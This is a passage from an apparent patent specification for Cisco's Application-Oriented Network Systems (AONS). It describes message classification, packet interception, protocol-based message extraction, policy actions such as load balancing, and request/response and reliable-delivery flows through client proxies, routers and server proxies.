user-specified input may indicate an order in which the one or more actions are to be performed. The user-specified input may indicate that outputs of actions are to be supplied as inputs to other actions. For example, network element 104, and more specifically AONS blade 604, may receive such user-specified input from a network administrator. In block 304, an association is established, at the network element, between the particular message classification and the one or more criteria. For example, AONS blade 604 may establish an association between a particular message classification and one or more criteria. For example, the criteria may indicate a particular string of text that a message needs to contain in order for the message to belong to the associated message classification. For another example, the criteria may indicate a particular path that needs to exist in the hierarchical structure of an XML-formatted message in order for the message to belong to the associated message classification. For another example, the criteria may indicate one or more source IP addresses and/or destination IP addresses from or to which a message needs to be addressed in order for the message to belong to the associated message classification. In block 306, an association is established, at the network element, between the particular message classification and the one or more actions. One or more actions that are associated with a particular message classification comprise a "policy" that is associated with that particular message classification. A policy may comprise a "flow" of one or more actions that are ordered according to a particular order specified in the user-specified input, and/or one or more other actions that are not ordered. For example, AONS blade 604 may establish an association between a particular message classification and one or more actions. Collectively, the operations of blocks 302-306 comprise "provisioning" the network element. In block 308, one or more data packets that are destined for a device other than the network element are intercepted by the network element. The data packets may be, for example, data packets that contain IP and TCP headers. The IP addresses indicated in the IP headers of the data packets differ from the network element's IP address; thus, the data packets are destined for a device other than the network element. For example, network element 104, and more specifically, supervisor blade 602, may intercept data packets that client application 110 originally sent. The data packets might be destined for server application 112, for example. In block 310, based on one or more information items indicated in the headers of the data packets, an application layer protocol that was used to transmit a message contained in the payload portions of the data packets (hereinafter "the message") is determined. The information items may include, for example, a source IP address in an IP header, a destination IP address in an IP header, a TCP source port in a TCP header, and a TCP destination port in a TCP header. For example, network element 104, and more specifically AONS blade 604, may store mapping information that maps FTP (an application layer protocol) to a first combination of IP addresses and/or TCP ports, and that maps HTTP (another application layer protocol) to a second combination of IP addresses and/or TCP ports. Based on this mapping information and the IP addresses and/or TCP ports indicated by the intercepted data packets, AONS blade 604 may determine which application layer protocol (FTP, HTTP, Simple Mail Transfer Protocol (SMTP), etc.) was used to transmit the message. In block 312, a message termination technique that is associated with the application layer protocol used to transmit the message is determined. For example, AONS blade 604 may store mapping information that maps FTP to a first procedure, that maps HTTP to a second procedure, and that maps SMTP to a third procedure. The first procedure may employ a first message termination technique that can be used to extract, from the data packets, a message that was transmitted using FTP. The second procedure may employ a second message termination technique that can be used to extract, from the data packets, a message that was transmitted using HTTP. The third procedure may employ a third message termination technique that can be used to extract, from the data packets, a message that was transmitted using SMTP. Based on this mapping information and the application layer protocol used to transmit the message, AONS blade 604 may determine which procedure should be called to extract the message from the data packets. In block 314, the contents of the message are determined based on the termination technique that is associated with the application layer protocol that was used to transmit the message. For example, AONS blade 604 may provide the data packets as input to a procedure that is mapped to the application layer protocol determined in block 312. The procedure may use the appropriate message termination technique to extract the contents of the message from the data packets. The procedure may return the message as output to AONS blade 604. Thus, in one embodiment, the message extracted from the data packets is independent of the application layer protocol that was used to transmit the message. In block 316, a message classification that is associated with criteria that the message satisfies is determined. For example, AONS blade 604 may store mapping information that maps different criteria to different message classifications. The mapping information indicates, among possibly many different associations, the association established in block 304. AONS blade 604 may determine whether the contents of the message satisfy criteria associated with any of the known message classifications. In one embodiment, if the contents of the message satisfy the criteria associated with a particular message classification, then it is determined that the message belongs to the particular message classification. Although, in one embodiment, the contents of the message are used to determine a message's classification, in alternative embodiments, information beyond that contained in the message may be used to determine the message's classification. For example, in one embodiment, a combination of the contents of the message and one or more IP addresses and/or TCP ports indicated in the data packets that contain the message is used to determine the message's classification. For another example, in one embodiment, one or more IP addresses and/or TCP ports indicated in the data packets that contain the message are used to determine the message's classification, regardless of the contents of the message. In block 318, one or more actions that are associated with the message classification determined in block 316 are performed. If two or more of the actions are associated with a specified order of performance, as indicated by the user-specified input, then those actions are performed in the specified order. If the output of any of the actions is supposed to be provided as input to any of the actions, as indicated by the user-specified input, then the output of the specified action is provided as input to the other specified action. A variety of different actions may be performed relative to the message. For example, an action might be a "load-balancing" action that specifies one or more parameters. The parameters might include a pointer or reference to a load-balancing algorithm, such as a round-robin algorithm, a weighted round-robin algorithm, or the adaptive load-balancing algorithm discussed above with reference to FIG. 2B. When the "load-balancing" action is performed, the load-balancing algorithm referenced by the action is invoked. Additionally, the parameters might include a pointer or reference to a session identifier locating technique. When the "load-balancing" action is performed, the session identifier locating technique referenced by the action is invoked. If a message contains a session identifier, then the message is sent towards the server application to which the session identifier is mapped. As a result of the method illustrated in flow diagram 300, network routers may be configured to perform data traffic load-balancing operations. Different load-balancing algorithms may be used in relation to different types of data traffic. Thus, for example, "purchase order" messages may be distributed among servers according to a first load-balancing algorithm, while "account transaction" messages may be distributed among servers according to a second, different load-balancing algorithm. FIG. 4 depicts a sample flow 400 that might be associated with a particular message classification. Flow 400 comprises, in order, actions 402-414; other flows may comprise one or more other actions. Action 402 indicates that the content of the message should be modified in a specified manner. Action 404 indicates that a specified event should be written to a specified log. Action 406 indicates that the message's destination should be changed to a specified destination. Action 408 indicates that the message's format should be translated into a specified message format. Action 410 indicates that the application layer protocol used to transmit the message should be changed to a specified application layer protocol. Action 412 indicates that the message should be encrypted using a particular key. Action 414 indicates that the message should be forwarded towards the message's destination. In other embodiments, any one of actions 402-414 may be performed individually or in combination with any others of actions 402-414. Application-Oriented Network Systems (AONS) is a technology foundation for building a class of products that embed intelligence into the network to better meet the needs of application deployment. AONS complements existing networking technologies by providing a greater degree of awareness of what information is flowing within the network and helping customers to integrate disparate applications by routing information to the appropriate destination, in the format expected by that destination; enforce policies for information access and exchange; optimize the flow of application traffic, both in terms of network bandwidth and processing overheads; provide increased manageability of information flow, including monitoring and metering of information flow for both business and infrastructure purposes; and provide enhanced business continuity by transparently backing up or re-routing critical business data. AONS provides this enhanced support by understanding more about the content and context of information flow. As such, AONS works primarily at the message rather than at the packet level. Typically, AONS processing of information terminates a TCP connection to inspect the full message, including the "payload" as well as all headers. AONS also understands and assists with popular application-level protocols such as HTTP, FTP, SMTP and de facto standard middleware protocols. AONS differs from middleware products running on general-purpose computing systems in that AONS' behavior is more akin to a network appliance, in its simplicity, total cost of ownership and performance. Furthermore, AONS integrates with network-layer support to provide a more holistic approach to information flow and management, mapping required features at the application layer into low-level networking features implemented by routers, switches, firewalls and other networking systems. Although some elements of AONS-like functionality are provided in existing product lines from Cisco Systems, Inc., such products typically work off a more limited awareness of information, such as IP/port addresses or HTTP headers, to provide load balancing and failover solutions. AONS provides a framework for broader functional support, a broader class of applications and a greater degree of control and management of application data. An "application" is a software entity that performs a business function either running on servers or desktop systems. The application could be a packaged application, software running on application servers, a legacy application running on a mainframe, or custom or proprietary software developed in house to satisfy a business need or a script that performs some operation. These applications can communicate with other applications in the same department (departmental), across departments within a single enterprise (intra enterprise), across an enterprise and its partners (inter-enterprise or B2B) or an enterprise and its customers (consumers or B2C). AONS provides value added services for any of the above scenarios. An "application message" is a message that is generated by an application to communicate with another application. The application message could specify the different business level steps that should be performed in handling this message and could be in any of the message formats described in the section below. In the rest of the document, unless otherwise specified explicitly, the term "message" also refers to an application message. An "AONS node" is the primary AONS component within the AONS system (or network). As described later, the AONS node can take the shape of a client proxy, server proxy or an intermediate device that routes application messages. Each application message, when received by the first AONS node, gets assigned an AONS message ID and is considered to be an "AONS message" until that message gets delivered to the destination AONS node. The concept of the AONS message exists within the AONS cloud. A single application message may map to more than one AONS message. This may be the case, for example, if the application message requires processing by more than one business function. For example, a "LoanRequest" message that is submitted by a requesting application and that needs to be processed by both a "CreditCheck" application and a "LoanProcessing" application would require processing by more than one business function. In this example, from the perspective of AONS, there are two AONS messages: The "LoanRequest" to the "CreditCheck" AONS message from the requesting application to the CreditCheck application; and the "LoanRequest" to the "LoanProcessing" AONS message from the CreditCheck application to the LoanProcessing Application. In one embodiment, AONS messages are encapsulated in an AONP (AON Protocol) header and are translated to a "canonical" format. Reliability, logging and security services are provided from an AONS message perspective. The set of protocols or methods that applications typically use to communicate with each other are called "application access protocols" (or methods) from an AONS perspective. Applications can communicate to the AONS network (typically end point proxies: a client proxy and a server proxy) using any supported application access methods. Some examples of application access protocols include: IBM MQ Series, Java Message Service (JMS), TIBCO, Simple Object Access Protocol (SOAP) over Hypertext Transfer Protocol (HTTP)/HTTPS, and Simple Mail Transfer Protocol (SMTP). Details about various access methods are explained in later sections of this document. There are a wide variety of "message formats" that are used by applications. These message formats may range from custom or proprietary formats to industry-specific formats to standardized formats. Extensible Markup Language (XML) is gaining popularity as a universal language or message format for applications to communicate with each other. AONS supports a wide variety of these formats. In addition, AONS provides translation services from one format to another based on the needs of applications. A typical deployment might involve a first AONS node that receives an application message (the client proxy) translating the message to a "canonical" format, which is carried as an AONS message through the AONS network. The server proxy might translate the message from the "canonical" format to the format understood by the receiving application before delivering the message. For understanding some of the non-industry standard formats, a message dictionary may be used. A node that performs the gateway functionality between multiple application access methods or protocols is called a "protocol gateway." An example of this would be a node that receives an application message through File Transfer Protocol (FTP) and sends the same message to another application as a HTTP post. In AONS, the client and server proxies are typically expected to perform the protocol gateway functionality. If an application generates a message in Electronic Data Interchange (EDI) format and if the receiving application expects the message to be in an XML format, then the message format needs to be translated but the content of the message needs to be kept intact through the translation. In AONS, the end point proxies typically perform this "message format translation" functionality. In some cases, even though the sending and receiving application use the same message format, the content needs to be translated for the receiving application. For example, if a United States-resident application is communicating with a United Kingdom-resident application, then the date format in the messages between the two applications might need to be translated (from mm/dd/yyyy to dd/mm/yyyy) even if the applications use the same data representation (or message format). This translation is called "content translation." As defined previously, AONS can be defined as network-based intelligent intermediary systems that efficiently and effectively integrate business and application needs with more flexible and responsive network services. AONS operates at a higher layer (layers 5-6) than traditional network element products (layers 2-4). AONS uses message-level inspection as a complement to packet-level inspection-by understanding application messages, AONS adds value to multiple network element products, such as switches, firewalls, content caching systems and load balancers, on the "message exchange route." AONS provides increased flexibility and granularity of network responsiveness in terms of security, reliability, traffic optimization (compression, caching), visibility (business events and network events) and transformation (e.g., from XML to EDI). AONS is a comprehensive technology platform, not just a point solution. AONS can be implemented through distributed intelligent intermediary systems that sit between applications, middleware, and databases in a distributed intra- and inter-enterprise environment (routing messages, performing transformations, etc.). AONS provides a flexible framework for end user configuration of business flows and policies and partner-driven extensibility of AONS services. AONS is especially well suited for network-based deployment. AONS is network-based rather than general-purpose server-based. AONS is hybrid software-based and hardware-based (i.e., application-specific integrated circuit (ASIC)/field programmable gate array (FPGA)-based acceleration). AONS uses out-of-band or in-line processing of traffic, as determined by policy. AONS is deployed in standalone products (network appliances) as well as embedded products (service blades for multiple switching, routing, and storage platforms). This section outlines the system overview of an example AONS system. FIG. 7 is a diagram 700 that illustrates the various components involved in an example AONS network 702 according to one embodiment of the invention. The roles performed by each of the nodes are mentioned in detail in subsequent sections. Within AONS network 702, key building blocks include AONS Endpoint Proxies (AEPs) 704-710 and an AONS Router (AR). Visibility into application intent may begin within AEP 704 placed at the edge of a logical AONS "cloud." As a particular client application of client applications 714A-N attempts to send a message across the network to a particular server application destination of server applications 716A-N and 718A-N, the particular client application will first interact with AEP 704. AEP 704 serves as either a transparent or explicit messaging gateway which aggregates network packets into application messages and infers the message-level intent by examining the header and payload of a given message, relating the message to the appropriate context, optionally applying appropriate policies (e.g. message encryption, transformation, etc.) and then routing the message towards the message's application destination via a network switch. AONS Router (AR) 712 may intercept the message en route to the message's destination endpoint. Based upon message header contents, AR 712 may determine that a new route would better serve the needs of a given application system. AR 712 may make this determination based upon enterprise-level policy, taking into account current network conditions. As the message nears its destination, the message may encounter AEP 706, which may perform a final set of operations (e.g. message decryption, acknowledgement of delivery) prior to the message's arrival. In one embodiment, each message is only parsed once: when the message first enters the AONS cloud. It is the first AEP that a message traverses that is responsible for preparing a message for optimal handling within the underlying network. AEPs 704-708 can further be classified into AEP Client Proxies and AEP Server Proxies to explicitly highlight roles and operations performed by the AEP on behalf of the specific end point applications. A typical message flow involves a particular client application 714A submitting a message to the AEP Client Proxy (CP) 704 through one of the various access protocols supported by AONS. On receiving this message, AEP CP 704 assigns an AONS message id to the message, encapsulates the message with an AONP header, and performs any necessary operations related to the AONS network (e.g. security and reliability services). Also, if necessary, the message is converted to a "canonical" format by AEP CP 704. The message is carried over a TCP connection to AR 710 along the path to the destination application 718A. The AONS routers along the path perform the infrastructure services necessary for the message and can change the routing based on the policies configured by the customer. The message is received at the destination AEP Server Proxy (SP) 706. AEP SP 706 performs necessary security and reliability functions and translates the message to the format that is understood by the receiving application, if necessary. AEP SP 706 then sends the message to receiving application 718A using any of the access protocols that application 718A and AONS support. A detailed message flow through AONS network 702 is described in later sections. This section outlines the different concepts that are used from an AONS perspective. An "AEP Client Proxy" is an AONS node that performs the services necessary for applications on the sending side of a message (a client). In the rest of this document, an endpoint proxy also refers to a client or server proxy. The typical responsibilities of the client proxy in processing a message are: message pre-classification & early rejection, protocol management, message identity management, message encapsulation in an AONP header, end point origination for reliable delivery, security end point service origination (encryption, digital signature, authentication), flow selection & execution/infrastructure services (logging, compression, content transformation, etc.), routing--next hop AONS node or destination, AONS node and route discovery/advertising role and routes, and end point origination for the reliable delivery mechanism (guaranteed delivery router). Not all functionalities described above need to be performed for each message. The functionalities performed on the message are controlled by the policies configured for the AONS node. An "AEP Server Proxy" is an AONS node that performs the services necessary for applications on the receiving side of a message (a server). In the rest of the document, a Server Proxy may also be referred as an end point proxy. The typical responsibilities of the Server Proxy in processing a message are: protocol management, end point termination for reliable delivery, security end point service termination (decryption, verification of digital signature, etc.), flow selection & execution/infrastructure services (logging, compression, content translation, etc.), message de-encapsulation in AONP header, acknowledgement to sending AONS node, application routing/request message delivery to destination, response message correlation, and routing to entry AONS node. Note that not all the functionalities listed above need to be performed for each message. The functionalities performed on the message are controlled by the policies configured for the AONS node and what the message header indicates. An "AONS Router" is an AONS node that provides message-forwarding functionalities along with additional infrastructure services within an AONS network. An AONS Router communicates with Client Proxies, Server Proxies and other AONS Routers. An AONS Router may provide service without parsing a message; an AONS Router may rely on an AONP message header and the policies configured in the AONS network instead of parsing messages. An AONS Router provides the following functionalities: scalability in the AONS network in terms of the number of TCP connections needed; message routing based on message destination, policies configured in the AONS cloud, a route specified in the message, and/or content of the message; a load at the intended destination-re-routing if needed; availability of the destination-re-routing if needed; cost of transmission (selection among multiple service providers); and infrastructure services such as sending to a logging facility, sending to a storage area network (SAN) for backup purposes, and interfacing to a cache engine for cacheable messages (like catalogs). AONS Routers do not need to understand any of the application access protocols and, in one embodiment, deal only with messages encapsulated with an AONP header. Application-Oriented Networking Protocol (AONP) is a protocol used for communication between the nodes in an AONS network. In one embodiment, each AONS message carries an AONP header that conveys the destination of the message and additional information for processing the message in subsequent nodes. AONP also addresses policy exchange (static or dynamic), fail-over among nodes, load balancing among AONS nodes, and exchange of routing information. AONP also enables application-oriented message processing in multiple network elements (like firewalls, cache engines and routers/switches). AONP supports both a fixed header and a variable header (formed using type-length-value (TLV) fields) to support efficient processing in intermediate nodes as well as flexibility for additional services. Unless explicitly specified otherwise, "router" or "switch" refers herein to a typical Layer 3 or Layer 2 switch or a router that is currently commercially available. In one embodiment, an underlying "AONS foundation platform of subsystem services" (AOS) provides a range of general-purpose services including support for security, compression, caching, reliability, policy management and other services. On top of this platform, AONS then offers a range of discreet functional components that can be wired together to provide the overall processing of incoming data traffic. These "bladelets™" are targeted at effecting individual services in the context of the specific policy or action demanded by the application or the information technology (IT) manager. A series of access method adaptors ensure support for a range of ingress and egress formats. Finally, a set of user-oriented tools enable managers to appropriately view, configure and set policies for the AONS solution. These four categories of functions combine to provide a range of end-customer capabilities including enhanced security, infrastructure optimization, business continuity, application integration and operational visibility. Enhanced security and reliability: enabling reliable message delivery and providing message-level security in addition to existing network-level security. Infrastructure optimization: making more efficient use of network resources by taking advantage of caching and compression at the message level as well as by integrating application and network quality-of-service (QoS). Business and infrastructure activity monitoring and management: by reading information contained in the application layer message, AONS can log, audit, and manage application-level business events, and combine these with network, server, and storage infrastructure events in a common, policy-driven management environment. Authentication: AONS can verify the identity of the sender of an inbound message based upon various pieces of information contained within a given message (username/password, digital certificate, Security Assertion Markup Language (SAML) assertion, etc.), and, based upon these credentials, determine whether or not the message should be processed further. Authorization: Once principal credentials are obtained via message inspection, AONS can determine what level of access the originator of the message should have to the services it is attempting to invoke. AONS may also make routing decisions based upon such derived privileges or block or mask certain data elements within a message once it's within an AONS network as appropriate. Encryption/Decryption: Based upon policy, AONS can perform encryption of message elements (an entire message, the message body or individual elements such as credit card number) to maintain end-to-end confidentiality as a message travels through the AONS network. Conversely, AONS can perform decryption of these elements prior to arrival at a given endpoint. Digital Signatures: In order to ensure message integrity and allow for non-repudiation of message transactions, AONS can digitally sign entire messages or individual message elements at any given AEP. The decision as to what gets signed will be determined by policy as applied to information derived from the contents and context of each message. Reliability: AONS can complement existing guaranteed messaging systems by intermediating between unlike proprietary mechanisms. It can also provide reliability for HTTP-based applications (including web services) that currently lack reliable delivery. As an additional feature, AONS can generate confirmations of successful message delivery as well as automatically generate exception responses when delivery cannot be confirmed. Compression: AEPs can compress message data prior to sending the message data across the network in order to conserve bandwidth and conversely decompress it prior to endpoint delivery. Caching: AONS can cache the results of previous message inquires based upon the rules defined for a type of request or based upon indicators set in the response. Caching can be performed for entire messages or for certain elements of a message in order to reduce application response time and conserve network bandwidth utilization. Message element caching enables delta processing for subsequent message requests. TCP Connection Pooling: By serving as an intermediary between message clients and servers AONS can consolidate the total number of persistent connections required between applications. AONS thereby reduces the client and server-processing load otherwise associated with the ongoing initiation and teardown of connections between a mesh of endpoints. Batching: An AONS intermediary can batch transactional messages destined for multiple destinations to reduce disk I/O overheads on the sending system. Similarly, transactional messages from multiple sources can be batched to reduce disk I/O overheads on the receiving system. Hardware Acceleration: By efficiently performing compute-intensive functions such as encryption and Extensible Stylesheet Language Transformation (XSLT) transformations in an AONS network device using specialized hardware, AONS can offload the computing resources of endpoint servers, providing potentially lower-cost processing capability. Quality of Service: AONS can integrate application-level QoS with network-level QoS features based on either explicit message prioritization (e.g., a message tagged as "high priority") or via policy that determines when a higher quality of network service is required for a message as specific message content is detected. Policy Enforcement: At the heart of optimizing the overall AONS solution is the ability to ensure business-level polices are expressed, implemented and enforced by the infrastructure. The AONS Policy Manager ensures that once messages are inspected, the appropriate actions (encryption, compression, routing, etc.) are taken against that message as appropriate. Auditing/Logging/Metering: AONS can selectively filter messages and send them to a node or console for aggregation and subsequent analysis. Tools enable viewing and analysis of message traffic. AONS can also generate automatic responses to significant real-time events, both business and infrastructure-related. By intelligently gathering statistics and sending them to be logged, AONS can produce metering data for auditing or billing purposes. Management: AONS can combine both message-level and network infrastructure level events to gain a deeper understanding of overall system health. The AONS management interface itself is available as a web service for those who wish to access it programmatically. Testing and Validation: AONS' ability to intercept message traffic can be used to validate messages before allowing them to reach destination applications. In addition to protecting from possible application or server failures, this capability can be leveraged to test new web services and other functions by examining actual message flow from clients and servers prior to production deployment. AONS also provides a "debug mode" that can be turned on automatically after a suspected failure or manually after a notification to assist with the overall management of the device. Workload Balancing and Failover: AONS provides an approach to workload balancing and failover that is both policy- and content-driven. For example, given an AONS node's capability to intermediate between heterogeneous systems, the AONS node can balance between unlike systems that provide access to common information as requested by the contents of a message. AONS can also address the issue of message affinity necessary to ensure failover at the message rather than just the session level as is done by most existing solutions. Balancing can also take into account the response time for getting a message reply, routing to an alternate destination if the preferred target is temporarily slow to respond. Business Continuity: By providing the ability to replicate inbound messages to a remote destination, AONS enables customers to quickly recover from system outages. AONS can also detect failed message delivery and automatically re-route to alternate endpoints. AONS AEPs and ARs themselves have built-in redundancy and failover at the component level and can be clustered to ensure high availability. Message Protocol Gateway: AONS can act as a gateway between applications using different transport protocols. AONS supports open standard protocols (e.g. HTTP, FTP, SMTP), as well as popular or de facto standard proprietary protocols such as IBM Websphere MQ. Message Transformations: AONS can transform the contents of a message to make them appropriate for a particular receiving application. This can be done for both XML and non-XML messages, the latter via the assistance of either a message dictionary definition or a well-defined industry standard format. FIG. 8 is a block diagram that depicts functional modules within an example AONS node. AONS node 800 comprises AOS configuration and management module 802, flows/rules 804, AOS common services 806, AOS message execution controller 808, AOS protocol access methods 810, and AOS platform-specific "glue" 812. AONS node 800 interfaces with Internetworking Operating System (IOS) 814 and Linux Operating System 816. Flows/rules 804 comprise bladelets™ 818, scriptlets™ 820, and scriptlet™ container 822. In one embodiment, AOS common services 806 include: security services, standard compression services, delta compression services, caching service, message logging service, policy management service, reliable messaging service, publish/subscribe service, activity monitoring service, message distribution service, XML parsing service, XSLT transformation service, and QoS management service. In one embodiment, AOS protocol/access methods 810 include: TCP/SSL, HTTP/HTTPS, SOAP/HTTP, SMTP, FTP, JMS/MQ and JMS/RV, and Java Database Connectivity (JDBC). In one embodiment, AOS message execution controller 808 includes: an execution controller, a flow subsystem, and a bladelet™ subsystem. In one embodiment, AOS bladelets™ 818 and scriptlets™ 820 include: message input (read message), message output (send message), logging/audit, decision, external data access, XML parsing, XML transformation, caching, scriptlet container, publish, subscribe, message validation (schema, format, etc.), filtering/masking, signing, authentication, authorization, encryption, decryption, activity monitoring sourcing, activity monitoring marking, activity monitoring processing, activity monitoring notification, message discard, firewall block, firewall unblock, message intercept, and message stop-intercept. In one embodiment, AOS configuration and management module 802 includes: configuration, monitoring, topology management, capability exchange, failover redundancy, reliability/availability/serviceability (RAS) services (tracing, debugging, etc.), archiving, installation, upgrades, licensing, sample scriptlets™, sample flows, documentation, online help, and language localization. In one embodiment, supported platforms include: Cisco Catalyst 6503, Cisco Catalyst 6505, Cisco Catalyst 6509, and Cisco Catalyst 6513. In one embodiment, supported supervisor modules include: Sup2 and Sup720. In one embodiment, specific functional areas relating to the platform include: optimized TCP, SSL, public key infrastructure (PKI), encryption/decryption, interface to Cat6K supervisor, failover/redundancy, image management, and QoS functionality. AONS may be configured to run in multiple modes depending on application integration needs, and deployment scenarios. According to one embodiment, the primary modes of operation include implicit mode, explicit mode, and proxy mode. In implicit mode, an AONS node transparently intercepts relevant traffic with no changes to applications. In explicit mode, applications explicitly address traffic to an intermediary AONS node. In proxy mode, applications are configured to work in conjunction with AONS nodes, but applications do not explicitly address traffic to AONS nodes. In implicit mode, applications are unaware ot AONS presence. Messages are address to receiving applications. Messages are redirected to AONS via configuration of application "proxy" or middleware systems to route messages to AONS, and/or via configuration of networks (packet interception). For example, domain name server (DNS)-based redirection could be used to route messages. For another example, a 5-tuple-based access control list (ACL) on a switch or router could be used. Network-based application recognition and content switching modules may be configured for URL/URI redirection. Message-based inspection may be used to determine message types and classifications. In implicit mode, applications communicate with each other using AONS as an intermediary (implicitly), using application-native protocols. Traffic redirection, message classification, and "early rejection" (sending traffic out of AONS layers prior to complete processing within AONS layers) may be accomplished via a variety of mechanisms, such as those depicted in FIG. 9. FIG. 9 shows multiple tiers of filtering that may be performed on message traffic in order to produce only a select set of traffic that will be processed at the AONS layer. Traffic that is not processed at the AONS layer may be treated as any other traffic. At the lowest layer, layer 902, all traffic passes through. At the next highest layer, layer 904, traffic may be filtered based on 5-tuples. A supervisor blade or Internetwork Operating System (IOS) may perform such filtering. Traffic that passes the filters at layer 904 passes to layer 906. At layer 906, traffic may be further filtered based on network-based application recognition-like filtering and/or message classification and rejection. Traffic that passes the filters at layer 906 passes to layer 908. At layer 908, traffic may be further filtered based on protocol headers. For example, traffic may be filtered based on URLs/URIs in the traffic. Traffic that passes the filters at layer 908 passes to layer 910. At layer 910, traffic may be processed based on application layer messages, include headers and contents. For example, XPath paths within messages may be used to process traffic at layer 910. An AONS blade may perform processing at layer 910. Thus, a select subset of all network traffic may be provided to an AONS blade. In explicit mode, applications are aware of AONS presence. Messages are explicitly addressed to AONS nodes. Applications may communicate with AONS using AONP. AONS may perform service virtualization and destination selection. In proxy mode, applications are explicitly unaware of AONS presence. Messages are addressed to their ultimate destinations (i.e., applications). However, client applications are configured to direct traffic via a proxy mode. Components of message management in AONS may be viewed from two perspectives: a node view and a cloud view. FIG. 10 is a diagram that illustrates the path of a message within an AONS cloud 1010 according to a cloud view. A client application 1004 sends a message to an AONS Client Proxy (CP) 1006. If AONS CP 1006 is not present, then client application 1004 may send the message to an AONS Server Proxy (SP) 1008. The message is processed at AONS CP 1006. AONS CP 1006 transforms the message into AONP format if the message is entering AONS cloud 1010. Within AONS cloud 1010, the message is routed using AONP. Thus, using AONP, the message may be routed from AONS CP 1006 to an AONS router 1012, or from AONS CP 1006 to AONS SP 1008, or from AONS router 1012 to another AONS router, or from AONS router 1012 to AONS SP 1008. Messages processed at AONS nodes are processed in AONP format. When the message reaches AONS SP 1008, AONS SP 1008 transforms the message into the message format used by server application 1014. AONS SP 1008 routes the message to server application 1014 using the message protocol of server application 1014. Alternatively, if AONS SP 1008 is not present, AONS CP 1006 may route the message to server application 1014. The details of the message processing within AONS cloud 1010 can be understood via the following perspectives: Request/Response Message Flow, One-Way Message Flow, Message Flow with Reliable Delivery, and Node-to-Node Communication. FIG. 11A and FIG 11B are diagrams that illustrate a request/response message flow. Referring to FIG. 11A, at circumscribed numeral 1, a sending application 1102 sends a message towards a receiving application 1104. At circumscribed numeral 2, an AEP CP 1106 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 3, AEP CP 1106 sends the AONP message to an AONS router 1108. At circumscribed numeral 4, AONS router 1108 receives the AONP message. At circumscribed numeral 5, AONS router 1108 sends the AONP message to an AEP SP 1110. At circumscribed numeral 6, AEP SP 1110 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 7, AEP SP 1110 sends the message to receiving application 1104. Referring to FIG. 11B, at circumscribed numeral 8, receiving application 1104 sends a response message toward sending application 1102. At circumscribed numeral 9, AEP SP 1110 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 10, AEP SP 1110 sends the AONP message to AONS router 1108. At circumscribed numeral 11, AONS router 1108 receives the AONP message. At circumscribed numeral 12, AONS router 1108 sends the AONP message to AEP CP 1106. At circumscribed numeral 13, AEP CP 1106 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 14, AEP CP 1106 sends the message to sending application 1102. Thus, a request is routed from sending application 1102 to receiving application 1104, and a response is routed from receiving application 1104 to sending application 1102. FIG. 12A and FIG 12B are diagrams that illustrate alternative request/response message flows. FIG. 12A shows three possible routes that a message might take from a sending application 1202 to a receiving application 1204. According to a first route, sending application 1202 sends the message toward receiving application 1204, but an AEP CP 1206 intercepts the message and sends the message to receiving application 1204. According to a second route, sending application 1202 sends the message toward receiving application 1204, but AEP CP 1206 intercepts the message, encapsulates the message within an AONP message, and sends the AONP message to an AEP SP 1208, which decapsulates the message from the AONP message and sends the message to receiving application 1204. According to a third route, sending application 1202 sends the message toward receiving application 1204, but AEP SP 1208 intercepts the message and sends the message to receiving application 1204. FIG. 12B shows three possible routes that a response message might take from receiving application 1204 to sending application 1202. According to a first route, receiving application 1204 sends the message toward sending application 1202, but AEP CP 1206 intercepts the message and sends the message to sending application 1204. According to a second route, receiving application 1204 sends the message toward sending application 1202, but AEP SP 1208 intercepts the message, encapsulates the message within an AONP message, and sends the AONP message to AEP CP 1206, which decapsulates the message from the AONP message and sends the message to sending application 1202. According to a third route, receiving application 1204 sends the message toward sending application 1202, but AEP SP 1208 intercepts the message and sends the message to sending application 1202. FIG. 13 is a diagram that illustrates a one-way message flow. At circumscribed numeral 1, a sending application 1302 sends a message towards a receiving application 1304. At circumscribed numeral 2, an AEP CP 1306 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 3, AEP CP 1306 sends an ACK (acknowledgement) back to sending application 1302. At circumscribed numeral 4, AEP CP 1306 sends the AONP message to an AONS router 1308. At circumscribed numeral 5, AONS router 1308 receives the AONP message. At circumscribed numeral 6, AONS router 1308 sends the AONP message to an AEP SP 1310. At circumscribed numeral 7, AEP SP 1310 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 8, AEP SP 1310 sends the message to receiving application 1304. FIG. 14 is a diagram that illustrates alternative one-way message flows. FIG. 14 shows three possible routes that a message might take from a sending application 1402 to a receiving application 1404. According to a first route, sending application 1402 sends the message toward receiving application 1404, but an AEP CP 1406 intercepts the message and sends the message to receiving application 1404. AEP CP 1406 sends an ACK (acknowledgement) to sending application 1402. According to a second route, sending application 1402 sends the message toward receiving application 1404, but AEP CP 1406 intercepts the message, encapsulates the message within an AONP message, and sends the AONP message to an AEP SP 1408, which decapsulates the message from the AONP message and sends the message to receiving application 1404. Again, AEP CP 1406 sends an ACK to sending application 1402. According to a third route, sending application 1402 sends the message toward receiving application 1404, but AEP SP 1408 intercepts the message and sends the message to receiving application 1404. In this case, AEP SP 1408 sends an ACK to sending application 1402. Thus, when an AEP intercepts a message, the intercepting AEP sends an ACK to the sending application. According to one embodiment, AONP is used in node-to-node communication with the next hop. In one embodiment, AONP uses HTTP. AONP headers may include HTTP or TCP headers. AONP may indicate RM ACK, QoS level, message priority, and message context (connection, message sequence numbers, message context identifier, entry node information, etc.). The actual message payload is in the message body. Asynchronous messaging may be used between AONS nodes. AONS may conduct route and node discovery via static configuration (next hop) and/or via dynamic discovery and route advertising ("lazy" discovery). FIG. 15A and FIG 15B are diagrams that illustrate a request/response message flow with reliable message delivery. Referring to FIG. 15A, at circumscribed numeral 1, a sending application 1502 sends a message towards a receiving application 1504. At circumscribed numeral 2, an AEP CP 1506 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 3, AEP CP 1506 saves the message to a data store 1512. Thus, if there are any problems with sending the message, AEP CP 1506 can resend the copy of the message that is stored in data store 1512. At circumscribed numeral 4, AEP CP 1506 sends the AONP message to an AONS router 1508. At circumscribed numeral 5, AONS router 1508 receives the AONP message. At circumscribed numeral 6, AONS router 1508 sends the AONP message to an AEP SP 1510. At circumscribed numeral 7, AEP SP 1510 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 8, AEP SP 1510 sends 